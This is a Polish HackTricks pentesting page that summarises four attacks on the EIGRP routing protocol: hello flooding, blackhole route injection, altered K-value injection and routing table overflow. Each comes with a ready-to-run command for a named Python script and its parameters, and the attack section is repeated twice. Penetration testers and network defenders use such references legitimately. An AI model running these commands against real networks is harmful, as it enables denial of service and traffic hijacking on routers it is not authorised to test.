EIGRP Attacks

Dowiedz się i praktykuj Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Dowiedz się i praktykuj Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wesprzyj HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud na GitHubie.

To jest podsumowanie ataków opisanych w https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Sprawdź go dla dalszych informacji.

Atak Fałszywych Sąsiadów EIGRP

Cel: Przeciążenie procesorów routera poprzez zalewanie ich pakietami hello EIGRP, co potencjalnie prowadzi do ataku typu Denial of Service (DoS).
Narzędzie: Skrypt helloflooding.py.
Wykonanie: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parametry:
--interface: Określa interfejs sieciowy, np. eth0.
--as: Określa numer autonomicznego systemu EIGRP, np. 1.
--subnet: Ustawia lokalizację podsieci, np. 10.10.100.0/24.

Atak Czarną Dziurą EIGRP

Cel: Zakłócenie przepływu ruchu sieciowego poprzez wstrzyknięcie fałszywej trasy, prowadząc do czarnej dziury, gdzie ruch jest kierowany do nieistniejącego celu.
Narzędzie: Skrypt routeinject.py.
Wykonanie: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parametry:
--interface: Określa interfejs systemu atakującego.
--as: Określa numer AS EIGRP.
--src: Ustawia adres IP atakującego.
--dst: Ustawia docelowy adres IP podsieci.
--prefix: Określa maskę docelowego adresu IP podsieci.

Atak Wykorzystujący Wartości K

Cel: Tworzenie ciągłych zakłóceń i ponownych połączeń w domenie EIGRP poprzez wstrzyknięcie zmienionych wartości K, efektywnie prowadząc do ataku typu DoS.
Narzędzie: Skrypt relationshipnightmare.py.
Wykonanie: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parametry:
--interface: Określa interfejs sieciowy.
--as: Określa numer AS EIGRP.
--src: Ustawia adres IP rzeczywistego routera.

Atak Przepełnienia Tablicy Routingu

Cel: Obciążenie procesora i pamięci routera poprzez zalewanie tablicy routingu liczbnymi fałszywymi trasami.
Narzędzie: Skrypt routingtableoverflow.py.
Wykonanie: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parametry:
--interface: Określa interfejs sieciowy.
--as: Określa numer AS EIGRP.
--src: Ustawia adres IP atakującego.

Wesprzyj HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud na GitHubie.

PreviousDHCPv6 NextGLBP & HSRP Attacks

Last updated 4 months ago

Atak Fałszywych Sąsiadów EIGRP

Cel: Przeciążenie procesorów routera poprzez zalewanie ich pakietami hello EIGRP, co potencjalnie prowadzi do ataku typu Denial of Service (DoS).

Narzędzie: Skrypt helloflooding.py.

Wykonanie: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%

Parametry:

--interface: Określa interfejs sieciowy, np. eth0.

--as: Określa numer autonomicznego systemu EIGRP, np. 1.

--subnet: Ustawia lokalizację podsieci, np. 10.10.100.0/24.

Atak Czarną Dziurą EIGRP

Cel: Zakłócenie przepływu ruchu sieciowego poprzez wstrzyknięcie fałszywej trasy, prowadząc do czarnej dziury, gdzie ruch jest kierowany do nieistniejącego celu.

Narzędzie: Skrypt routeinject.py.

Wykonanie: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%

Parametry:

--interface: Określa interfejs systemu atakującego.

--as: Określa numer AS EIGRP.

--src: Ustawia adres IP atakującego.

--dst: Ustawia docelowy adres IP podsieci.

--prefix: Określa maskę docelowego adresu IP podsieci.

Atak Wykorzystujący Wartości K

Cel: Tworzenie ciągłych zakłóceń i ponownych połączeń w domenie EIGRP poprzez wstrzyknięcie zmienionych wartości K, efektywnie prowadząc do ataku typu DoS.

Narzędzie: Skrypt relationshipnightmare.py.

Wykonanie: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%

Parametry:

--interface: Określa interfejs sieciowy.

--as: Określa numer AS EIGRP.

--src: Ustawia adres IP rzeczywistego routera.

Atak Przepełnienia Tablicy Routingu

Cel: Obciążenie procesora i pamięci routera poprzez zalewanie tablicy routingu liczbnymi fałszywymi trasami.

Narzędzie: Skrypt routingtableoverflow.py.

Wykonanie: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%

Parametry:

--interface: Określa interfejs sieciowy.

--as: Określa numer AS EIGRP.

--src: Ustawia adres IP atakującego.